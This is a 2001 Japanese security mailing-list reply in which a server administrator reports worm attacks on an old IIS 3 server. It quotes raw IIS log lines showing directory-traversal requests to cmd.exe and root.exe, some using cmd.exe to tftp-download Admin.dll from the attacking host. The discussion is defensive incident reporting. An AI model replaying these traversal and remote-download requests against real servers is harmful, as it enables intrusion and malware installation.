[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[stalk:00899] Re: IIS への攻撃
- To: security-talk@xxxxxxxxxxxxxxxxxxxx
- Subject: [stalk:00899] Re: IIS への攻撃
- From: km <k_y@xxxxxxxxxxxxxxxx>
- Date: Wed, 19 Sep 2001 10:49:02 +0900
三毛です。
"minz@xxxxxxxx (Hiroshi Migimatsu ^^;)" wrote:
> | > 皆さんのところはどうでしょう?
> | 複数のIPアドレスから来てます。1つのアドレスからは連続した
> | シーケンスで来ます。
>
> ですね。連続していろいろなパターンの攻撃を仕掛けてきています。
> ちなみに、ログはこんなカンジです:
>
ウチにはサポートが打ち切られたIISの3が入っています。
感染するとtftpサーバに接続、ファイルを取り込んで外部から実行、
みたいな感じで感染しているみたいです。
xxx.yyy.zzz.188, -, 01/09/19, 6:30:30, W3SVC, hoge, xxx.yyy.rrr.13, 0, 72, 317, 403, 5, GET, /scripts/root.exe, /c+dir,
xxx.yyy.zzz.188, -, 01/09/19, 6:30:38, W3SVC, hoge, xxx.yyy.rrr.13, 100, 96, 2129, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
xxx.yyy.zzz.188, -, 01/09/19, 6:30:39, W3SVC, hoge, xxx.yyy.rrr.13, 190, 151, 286, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+tftp%20-i%20xxx.yyy.zzz.188%20GET%20Admin.dll%20c:\Admin.dll,
xxx.yyy.zzz.188, -, 01/09/19, 6:30:41, W3SVC, hoge, xxx.yyy.rrr.13, 190, 151, 286, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+tftp%20-i%20xxx.yyy.zzz.188%20GET%20Admin.dll%20d:\Admin.dll,
xxx.yyy.zzz.188, -, 01/09/19, 6:31:08, W3SVC, hoge, xxx.yyy.rrr.13, 17355, 151, 286, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+tftp%20-i%20xxx.yyy.zzz.188%20GET%20Admin.dll%20e:\Admin.dll,
xxx.yyy.zzz.188, -, 01/09/19, 6:31:09, W3SVC, hoge, xxx.yyy.rrr.13, 0, 76, 185, 500, 126, GET, /scripts/..%5c../Admin.dll, -,
>>以下略<<
CやDにAdmin.dllなんかが有るとやばいのかも。
でもAdmin.dllが動作しなかったのはIIS3だからか?
とりあえず、このサーバの穴を防がないといけないと思う今日この頃でした。
by三毛
--
- このメイリングリストに関する質問・問い合せ等は
- <security-talk@xxxxxxxxxx>までお知らせください
--
------------------------------------------------------------------------
ニュース速報! はインフォシークで!!
http://www.infoseek.co.jp/Home?pg=Home.html&svx=971122